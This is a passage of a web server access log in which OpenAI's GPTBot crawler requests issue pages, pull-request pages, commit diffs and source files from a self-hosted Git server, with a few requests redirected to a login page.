+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2fquery%2fclient-vscode" [Client 74.7.227.38] [Length 24917] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:18:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fsrc%2fcontroller.cpp.o" [Client 74.7.227.38] [Length 24234] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:18:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fcompiler_depend.make" [Client 74.7.227.38] [Length 22795] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:18:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fcmake_clean.cmake" [Client 74.7.227.38] [Length 23477] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:18:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fcompiler_depend.ts" [Client 74.7.227.38] [Length 22886] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2frequirements-windows.txt" [Client 74.7.227.38] [Length 20600] [Gzip 3.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat?display=source" [Client 74.7.227.38] [Length 13500] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat?display=rendered" [Client 74.7.227.38] [Length 11249] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:53:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f%ec%8a%a4%eb%a0%88%eb%93%9c_%eb%b6%84%eb%a6%ac_%ec%9e%91%ec%97%85_%ec%99%84%eb%a3%8c.md" [Client 74.7.227.38] [Length 34481] [Gzip 7.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:18:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12558] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12550] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9885] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11677] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fold_controller.cpp" [Client 74.7.227.38] [Length 22889] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" -[17/Feb/2026:18:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2flog_macros.hpp" [Client 74.7.227.38] [Length 23368] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fmodbus_tcp.hpp" [Client 74.7.227.38] [Length 26612] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fmodbus_tcp.hpp" [Client 74.7.227.38] [Length 19519] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fdata_format.hpp" [Client 74.7.227.38] [Length 26000] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:53:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:53:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 